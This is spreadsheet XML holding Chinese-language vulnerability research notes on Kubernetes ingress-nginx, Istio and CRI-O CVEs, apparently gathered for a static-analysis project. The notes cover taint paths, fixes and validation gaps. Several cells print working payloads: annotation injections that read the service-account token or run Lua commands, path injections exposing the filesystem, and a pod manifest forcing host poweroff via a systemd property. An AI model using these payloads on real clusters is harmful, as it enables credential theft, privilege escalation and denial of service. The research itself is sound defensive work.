    <t xml:space="preserve">
3/2
getConfiguration-&gt;getBackendServers-&gt;locationApplyAnnotations  2个调用点
getConfiguration-&gt;getBackendServers-&gt;createServers-&gt; locationApplyAnnotations 2个调用点</t>
  </si>
  <si>
    <t>完善校验规则-&gt; 没有找到漏洞对应的补丁</t>
  </si>
  <si>
    <t>CVE-2023-5044</t>
  </si>
  <si>
    <t>A security issue was identified in ingress-nginx where the nginx.ingress.kubernetes.io/permanent-redirect annotation on an Ingress object (in the networking.k8s.io or extensions API group) can be used to inject arbitrary commands, and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.</t>
  </si>
  <si>
    <t>v1.9.0</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/ingress-nginx/issues/10572</t>
  </si>
  <si>
    <t>nginx.ingress.kubernetes.io/permanent-redirect: https://www.mccune.org.uk;}location ~* "^/flibble(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* "^/flibblea(/|$)(.*)" { content_by_lua 'os.execute("touch /you")' 
# 原始重定向配置
https://www.mccune.org.uk;     # 正常URL和闭合分号
}                              # 闭合原有块
# 注入第一个location块
location ~* "^/flibble(/|$)(.*)" {
    content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))'
}
# 注入第二个location块
location ~* "^/flibblea(/|$)(.*)" { 
    content_by_lua 'os.execute("touch /you")'</t>
  </si>
  <si>
    <t>任意代码执行-&gt; 权限提升（可提升至集群管理员权限）</t>
  </si>
  <si>
    <t>校验缺失</t>
  </si>
  <si>
    <t>对应的注释：nginx.ingress.kubernetes.io/permanent-redirect
其他可输出结果：
- from-to-www-redirect
- temporal-redirect
- permanent-redirect
- permanent-redirect-code
（ingress.Location.Redirect）
使用}来闭合nginx配置中的当前上下文</t>
  </si>
  <si>
    <t xml:space="preserve">是
重定向 redirect </t>
  </si>
  <si>
    <t>自定义类型</t>
  </si>
  <si>
    <t>结构体字段
nginx.ingress.kubernetes.io/permanent-redirect
-&gt; 存在包装在redirect.Config中
对应anns.Ingress.Redirect
赋值位置： 
Configuration.[]Server.[]Location,Redirect</t>
  </si>
  <si>
    <t>代理配置</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">代码注释： 存在代码注释，但缺少安全性说明
文档： 对字段的危险性进行了详细的说明
https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations-risk/ ( 后续补充的）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>验证逻辑： 不存在验证逻辑</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>错误信息提示:</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">不存在错误信息
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>单元测试文件中进行测试：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>存在功能性测试</t>
    </r>
  </si>
  <si>
    <t>重定向和重写规则</t>
  </si>
  <si>
    <t>无验证直接使用</t>
  </si>
  <si>
    <t>完善校验规则-&gt; 没有找到漏洞对应的补丁
（ V1.9.0 版本进行修复）</t>
  </si>
  <si>
    <t>v1.0.0</t>
  </si>
  <si>
    <t>v1.19</t>
  </si>
  <si>
    <t>CVE-2021-25746</t>
  </si>
  <si>
    <t>Ingress-nginx directive injection via annotations: A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.</t>
  </si>
  <si>
    <t>&lt;v1.2.0</t>
  </si>
  <si>
    <t xml:space="preserve">v1.2.0-beta.0
v1.2.0
https://github.com/kubernetes/ingress-nginx/pull/8456
</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/126813</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">nginx.ingress.kubernetes.io/connection-proxy-header: "a;} location /fs/ { alias /; autoindex on; } location /proxy { set \$a b" 
# 原始配置块
location ... {
    proxy_set_header Connection "a;}    # 开始注入并闭合原块
    # 注入新的location块
    location /fs/ { 
        alias /;           # 指向根目录
        autoindex on;      # 开启目录浏览
    }
    location /proxy { 
        set $a b"         # 闭合引号
}
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>https://hackerone.com/reports/1378175</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 权限提升（可提升至集群管理员权限）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">对应的注释：nginx.ingress.kubernetes.io/connection-proxy-header
（ingress.Location.Connection）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>"a;}：提前关闭引号并使用分号结束当前语句，然后用大括号结束当前代码块
location /fs/ { alias /; autoindex on; }：注入一个新的location块，将/fs/路径映射到服务器根目录，并启用目录列表
location /proxy { set \$a b"：注入另一个location块，设置变量并添加额外的引号以平衡语法</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">结构体字段
nginx.ingress.kubernetes.io/connection-proxy-header
-&gt; 存在包装在connection.Config
对应 anns.Ingress.Connection
赋值位置：
Configuration.[]Server.[]Location,Connection
</t>
  </si>
  <si>
    <t>响应头设置</t>
  </si>
  <si>
    <t>controller
admission webhook（ 这个漏洞侧重修复在准入控制器中）</t>
  </si>
  <si>
    <t xml:space="preserve">新增check 
添加DeepInspect-&gt; 直接校验ingress.spec中字段
添加cfg.AnnotationValueWordBlocklist -&gt; 直接进行校验
上述两个校验都封装在校验函数中：CheckIngress
checkIngress只在准入控制器中进行调用
</t>
  </si>
  <si>
    <t>CVE-2021-25745</t>
  </si>
  <si>
    <t xml:space="preserve">1. spec中的字段需要另外处理：
- </t>
  </si>
  <si>
    <t>Ingress-nginx path can be pointed to service account token file：A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.</t>
  </si>
  <si>
    <t>v1.2.0-beta.0
v1.2.0
https://github.com/kubernetes/ingress-nginx/pull/8623/commits/3faba285f509e46d04997f7c0f0597efba5ae8c5</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/126812</t>
  </si>
  <si>
    <t xml:space="preserve">两种类型的payload:
1.alias:
paths:
- path: /gaf{alias /var/run/secrets/kubernetes.io/serviceaccount/;}location ~* ^/aaa
pathType: Prefix
2. root:
paths:
- path: /serviceaccount{root /var/run/secrets/kubernetes.io;}location ~* ^/aaa
</t>
  </si>
  <si>
    <t xml:space="preserve">
ingress.spec.rules[].http.paths[].path 
（ingress.Location.Path）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">代码注释： 存在代码注释，但缺少安全性说明
文档：无具体文档
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>验证逻辑： 不存在验证逻辑</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>错误信息提示:</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">不存在错误信息
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>单元测试文件中进行测试：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>存在功能性测试</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
admission controller</t>
  </si>
  <si>
    <t xml:space="preserve">验证逻辑增加：
准入控制器必须启用
</t>
  </si>
  <si>
    <t>CVE-2021-25742</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1.测试结果多次运行不一致 （存在问题）
2. 识别src type需要自动化指定分析范围，降低误报-&gt; 实现了一半，尚未实现完
</t>
    </r>
    <r>
      <rPr>
        <strike/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">3. 注释与数据结构字段之间的对应关系的自动化提取没有实现完 -》 需要在配置文件中指定分析入口
-》已实现
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">4.输出结果注释字段变成接口类型，需要对应找特定的字段
</t>
    </r>
  </si>
  <si>
    <t>ngress-nginx custom snippets allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces：A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster.</t>
  </si>
  <si>
    <t xml:space="preserve">v1.0.0
&lt;= v0.49.0
</t>
  </si>
  <si>
    <t xml:space="preserve">Fixed in 0.X branch -&gt; kubernetes/ingress-nginx#7666
https://github.com/kubernetes/ingress-nginx/pull/7666/commits/5fe464b303711da889809c9328399e2a94befcd2 （去除snippet)
Fixed in v1.X branch -&gt; kubernetes/ingress-nginx#7670
</t>
  </si>
  <si>
    <t xml:space="preserve">
nginx-ingress:
k8s: https://github.com/kubernetes/kubernetes/issues/126811</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.开启 allow-snippet-annottaions
2. 配置中snippet使用的位置有：
[server-snippet]
(https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#server-snippet)
[configuration-snippet]
(https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#configuration-snippet)
[auth-snippet]
(https://github.com/kubernetes/ingress-nginx/blob/main/docs/user-guide/nginx-configuration/annotations.md#external-authentication)
[modsecurity-snippet]
(https://github.com/kubernetes/ingress-nginx/blob/main/docs/user-guide/nginx-configuration/annotations.md#modsecurity)
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">其中对于server-snippet：
  annotations:
    nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
    nginx.ingress.kubernetes.io/server-snippet: |
      location /security/ {
        autoindex on;
        alias /var/run/secrets/kubernetes.io/serviceaccount/;
      }
攻击模式明显：
创建资源注入恶意payload-&gt; 执行代码（代码可获取应用的token)-&gt; 基于token对应的权限进行横向移动（扫描获取集群的密钥 List secret) </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
ingress.annotation.ConfigurationSnippet
https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#configuration-snippet
对应的注释： nginx.ingress.kubernetes.io/configuration-snippet: |
more_set_headers "Request-Id: $req_id";
延伸：
ingress.kubernetes.io/auth-snippet
ingress.kubernetes.io/configuration-snippet
ingress.kubernetes.io/server-snippet
ingress.kubernetes.io/modsecurity-snippet
（ingress.Location.ConfigurationSnippet）
</t>
  </si>
  <si>
    <t>或（ 存在多个字段可进行利用，但原因一致，没有限制\n字符的使用）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
----
1. 基本类型（string)
nginx.ingress.kubernetes.io/configuration-snippet-&gt;
anns.Ingress.ConfigurationSnippet
赋值位置：
Configuration.[]Server.[]Location,ConfigurationSnippet
2. 结构体字段：Ingress.kubernetes.io/auth-snippet-&gt;
 存在包装在authReq.Config中
对应：
anns.Ingress.ExternalAuth
赋值位置：
Configuration.[]Server.[]Location,.ExternalAuth
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>3  基本类型（string)
ingress.kubernetes.io/server-snippet-&gt;
anns.Ingress.ServerSnippet
对应的赋值位置：
Configuration.[]Server.ServerSnippet</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
4. 结构体字段
ingress.kubernetes.io/modsecurity-snippet-&gt;
包装在modSecurity.Config
对应
anns.Ingress.ModSecurity
对应的赋值位置：
Configuration.[]Server.[]Location.ModSecurity
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">代码注释： 存在代码注释，但缺少安全性说明
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>注释在目标赋值的左值字段</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
文档： 对字段的危险性进行了详细的说明
https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations-risk/ ( 后续补充的）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>验证逻辑： 不存在验证逻辑</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>错误信息提示:</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">不存在错误信息
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>单元测试文件中进行测试：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>存在功能性测试</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
调用深度： 3/2
getConfiguration-&gt;getBackendServers-&gt;locationApplyAnnotations  2个调用点
getConfiguration-&gt;getBackendServers-&gt;createServers-&gt; locationApplyAnnotations 2个调用点
 对于server-snippet
调用深度：2
getConfiguration-&gt;getBackendServers-&gt;createServers</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>新增配置决定是否启用相关字段</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
1. ingress-nginx-controller 配置中添加：allow-snippet-annotations："false"
1) Static Deploy Files
Edit the ConfigMap for ingress-nginx after deployment:
kubectl edit configmap -n ingress-nginx ingress-nginx-controller
Add directive:
data:
allow-snippet-annotations: “false”
More in
formation on the ConfigMap here
2) Deploying Via Helm
Set controller.allowSnippetAnnotations to false in the Values.yaml or add the directive to the helm deploy:
helm install [RELEASE_NAME] --set controller.allowSnippetAnnotations=false ingress-nginx/ingress-nginx
https://github.com/kubernetes/ingress-nginx/blob/controller-v1.0.1/charts/ingress-nginx/values.yaml#L76
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>验证逻辑增加：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
添加配置选项，选择性启用
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
与赋值点在同一函数中，支配赋值点</t>
  </si>
  <si>
    <t>gov1.19</t>
  </si>
  <si>
    <t>CVE-2022-21701</t>
  </si>
  <si>
    <t>1. 模板中的字段需要人工审计才得知-》 只可以输出粗粒度的资源</t>
  </si>
  <si>
    <t>Privileged Escalation in Kubernetes Gateway API:
Istio version 1.12.0 and 1.12.1 are vulnerable to a privilege escalation attack. Users who have CREATE permission for gateways.gateway.networking.k8s.io objects can escalate this privilege to create other resources that they may not have access to, such as Pod.</t>
  </si>
  <si>
    <t>1.12.0-1.12.1</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.12.2
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>https://github.com/istio/istio/pull/36197/commits/2aa1cbe02c968483f7aa5a32c6f0c0efe484c425</t>
    </r>
  </si>
  <si>
    <t>https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r</t>
  </si>
  <si>
    <t>Istio</t>
  </si>
  <si>
    <t>https://paper.seebug.org/1859/（ 比较复杂的漏洞利用流程-&gt; 利用的是
下面3个文章利用的都是networking.istio.io/service-type 的注入点
https://www.anquanke.com/post/id/272528（Go template 遇上 yaml 反序列化 CVE-2022-21701 分析）
https://paper.seebug.org/1882/（ 上述文章对应的seebug上的文章-&gt; lazydog写的）
https://lf.lc/cve/cve-2022-21701/（ 使用的是networking.istio.io/service-type 的注入点）</t>
  </si>
  <si>
    <t>集群范围（提升的K8s资源操作的权限）</t>
  </si>
  <si>
    <t>直接注入-&gt; 最终注入点在模版中</t>
  </si>
  <si>
    <t>gateway.annotation.networking.istio.io/service-type(直接通过模版文件分析）
-&gt; 输出结果没有精确到annotation</t>
  </si>
  <si>
    <t>系统信任级别的字段与低信任级别的字段进行拼接时，低信任级别的字段需要进行校验</t>
  </si>
  <si>
    <t>跨信任域数据传递</t>
  </si>
  <si>
    <t>资源配置模版注入-&gt;template.render</t>
  </si>
  <si>
    <t>控制器</t>
  </si>
  <si>
    <t xml:space="preserve">1. 更改sink，接受更为具体的metav1,Object接口而非泛型 inteface()
</t>
  </si>
  <si>
    <t>1.12.0</t>
  </si>
  <si>
    <t>go1.19</t>
  </si>
  <si>
    <t>CVE-2024-3154（需要切换go1.20.0版本）-&gt; 直接切换go1.23,3 版本</t>
  </si>
  <si>
    <t>类型：系统命令注入漏洞
位置：CRI-O对Pod注解的处理
原因：未过滤org.systemd.property.前缀的注解</t>
  </si>
  <si>
    <t>动态测试
构造资源配置文件动态触发：
finding out that CRI-O just passes pod annotations to OCI annotations:
opencontainers/runc#3923 (comment)</t>
  </si>
  <si>
    <t>A flaw was found in cri-o, where an arbitrary systemd property can be injected via a Pod annotation. Any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.</t>
  </si>
  <si>
    <t>1.29.3, 1.28.5, 1.27.5</t>
  </si>
  <si>
    <t>1.30.0, 1.29.4, 1.28.6, 1.27.6
https://github.com/opencontainers/runc/commit/3db0871f1cf25c7025861ba0d51d25794cb21623
https://github.com/opencontainers/runc/pull/4217
https://github.com/cri-o/cri-o/commit/77bbb1c279801c7d5c88b39281e22c033ccde362#diff-8aa632a6f4ad2a3a7fef52661816aa3977f23c0673ef29633c01116fee6745c6( 没有明确的修复）</t>
  </si>
  <si>
    <t>https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j</t>
  </si>
  <si>
    <t>cri-o</t>
  </si>
  <si>
    <t>环境条件：
- 运行受影响版本的CRI-O(如v1.24)
- 使用systemd作为init系统
- 系统支持相关systemd属性
权限要求：
- 能够创建Pod的权限
- 能够设置Pod注解的权限
集群配置：
- 未使用注解过滤webhook
- 未禁用systemd相关功能</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>攻击载荷：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
apiVersion: v1
kind: Pod
metadata:
  name: systemd-inject-pod
  annotations:
    # 注入危险的systemd属性
    org.systemd.property.SuccessAction: "'poweroff-force'"  # 强制关机
    # 或其他危险属性
    # org.systemd.property.ExecStart: "'/malicious/command'"
spec:
  containers:
  - name: attack-container
    image: quay.io/podman/hello
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">攻击向量示例：
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"># 1. 系统关机
org.systemd.property.SuccessAction: "'poweroff-force'"
# 2. 执行命令
org.systemd.property.ExecStart: "'/bin/evil_command'"
# 3. 修改系统配置
org.systemd.property.Environment: "'MALICIOUS_CONFIG=value'"
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>攻击流程：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
1. 部署恶意Pod：
kubectl apply -f malicious-pod.yaml
2. CRI-O处理过程：
Pod注解 -&gt; OCI注解 -&gt; systemd属性
3. systemd执行：
- 接收注入的属性
- 执行对应系统操作</t>
    </r>
  </si>
  <si>
    <t>单节点</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">pod.annotations:
org.systemd.property.*
攻击示例：
---
apiVersion: v1
kind: Pod
metadata:
  name: poc-arbitrary-systemd-property-injection
  annotations:
    # I believe that ExecStart with an arbitrary command works here too,
    # but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>org.systemd.property.SuccessAction: "'poweroff-force'"</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
spec:
  containers:
    - name: hello
      image: [quay.io/podman/hello](http://quay.io/podman/hello)</t>
    </r>
  </si>
  <si>
    <t>系统资源访问</t>
  </si>
  <si>
    <t>命令执行 （底层具体的低级容器运行时组件执行）</t>
  </si>
  <si>
    <t>底层runc</t>
  </si>
  <si>
    <t>增加check
-&gt; 增加unsafe annotation list 黑名单</t>
  </si>
  <si>
    <t xml:space="preserve">1.27.5（需要Go1.20以上的版本）
需要切换到go1.20.0版本
</t>
  </si>
  <si>
    <t>CVE-2022-1708</t>
  </si>
  <si>
    <t>1. 把container.*.command对应的字段输出</t>
  </si>
  <si>
    <t>静态分析-&gt; 基于代码相似性</t>
  </si>
  <si>
    <t>A vulnerability was found in CRI-O that causes memory or disk space exhaustion on the node for anyone with access to the Kube API. The ExecSync request runs commands in a container and logs the output of the command. This output is then read by CRI-O after command execution, and it is read in a manner where the entire file corresponding to the output of the command is read in. Thus, if the output of the command is large it is possible to exhaust the memory or the disk space of the node when CRI-O reads the output of the command. The highest threat from this vulnerability is system availability.</t>
  </si>
  <si>
    <t>&lt;= 1.24.0, 1.23.2, 1.22.4</t>
  </si>
  <si>
    <t>1.24.1, 1.23.3, 1.22.5
https://github.com/cri-o/cri-o/commit/f032cf649ecc7e0c46718bd9e7814bfb317cb544</t>
  </si>
  <si>
    <t>https://github.com/cri-o/cri-o/security/advisories/GHSA-fcm2-6c3h-pg6j</t>
  </si>
  <si>
    <t xml:space="preserve">  -执行探针检查
-使用exec执行进程
-容器内恶意程序执行</t>
  </si>
  <si>
    <t>攻击链：
1. 容器内程序触发ExecSync调用
2. containerd守护进程处理请求
3. 内存无限制增长
4. 系统资源耗尽
5. 其他工作负载受影响</t>
  </si>
  <si>
    <t>拒绝服务</t>
  </si>
  <si>
    <t xml:space="preserve">Pod.Spec.Containers.lifecycle.preStop.exec.command
Pod.Spec.Containers.lifecycle.postStart.exec.command
</t>
  </si>
  <si>
    <t>影响点：
- ExecSync API的实现
- 用于执行探针(probes)
- 用于执行"exec"功能
命令参数注入
关键操作跨组件</t>
  </si>
  <si>
    <t>cri server</t>
  </si>
  <si>
    <t>增加check</t>
  </si>
  <si>
    <t>v1.19.0</t>
  </si>
  <si>
    <t>CVE-2022-0811</t>
  </si>
  <si>
    <t>类型：容器逃逸漏洞
影响版本：CRI-O 1.19及以上
原因：内核参数(sysctl)安全检查的绕过</t>
  </si>
  <si>
    <t xml:space="preserve">静态分析
</t>
  </si>
  <si>
    <t>A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed.</t>
  </si>
  <si>
    <t>&gt;1.19.0 &lt;1.19.6</t>
  </si>
  <si>
    <t>1.19.6, 1.20.7, 1.21.6, 1.22.3, 1.23.2, 1.24.0
https://github.com/cri-o/cri-o/pull/5728</t>
  </si>
  <si>
    <t>https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7</t>
  </si>
  <si>
    <t>前提条件：
- 有权限部署Pod
- 目标集群使用CRI-O运行时
- CRI-O版本1.19-1.24.0之间</t>
  </si>
  <si>
    <t xml:space="preserve">攻击目标：
- kernel.core_pattern参数
- 可以通过修改此参数实现：
  * 容器逃逸
  * 宿主机任意命令执行
  * 获取root权限
------
攻击过程：
1. 创建带有特定sysctl配置的Pod
2. 利用'+'字符绕过安全检查
3. 修改kernel.core_pattern
4. 实现容器逃逸和命令执行
</t>
  </si>
  <si>
    <t>权限提升（容器逃逸）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Pod.spec.SecurityContext.sysctls
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>---
攻击向量示例：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
cat ./sysctl-set.yaml
apiVersion: v1
kind: Pod
metadata:
  name: sysctl-set
spec:
  securityContext:
   sysctls:
   - name: kernel.shm_rmid_forced
